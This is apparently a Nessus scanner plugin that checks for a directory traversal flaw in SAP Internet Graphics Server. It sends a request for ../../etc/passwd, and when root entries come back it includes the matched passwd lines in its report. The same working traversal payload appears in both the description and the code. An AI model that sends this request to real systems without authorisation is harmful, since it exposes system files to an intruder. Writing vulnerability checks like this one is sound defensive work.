#
# (C) Tenable Network Security
#

if(description)
{
 script_id(19298);
 script_bugtraq_id(14369);
 script_version ("$Revision: 1.1 $");
 
 name["english"] = "SAP Internet Graphics Server Directory Traversal Vulnerability";

 script_name(english:name["english"]);
 
 desc["english"] = "
Is is possible to read arbitrary files on the remote host by making a request
such as :

	GET /htdocs/../../../../../../etc/passwd


An attacker may exploit this flaw to read the remote files with the privileges
of the web server process.

Solution : Contact your software vendor for a fix
Risk factor : High";

 

 script_description(english:desc["english"]);
 
 summary["english"] = "Attempts to read /etc/passwd";
 
 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2005 Tenable Network Security");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);

if(!get_port_state(port))exit(0);

req = http_get(item:"/htdocs/../../../../../../../../../../../../../etc/passwd", port:port);

res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if( ! res ) exit(0);
if (egrep(pattern:"root:.*:0:[01]:", string:res) )
	{
	passwd = egrep(pattern:":.*:.*:.*:.*:", string:res);
	txt = "
Is is possible to read arbitrary files on the remote host by making a request
such as :

	GET /htdocs/../../../../../../etc/passwd

Which produces : 
" + passwd +  "

An attacker may exploit this flaw to read the remote files with the privileges
of the web server process.

Solution : Contact your software vendor for a fix
Risk factor : High";

	security_hole(port:port, data:txt);
	}
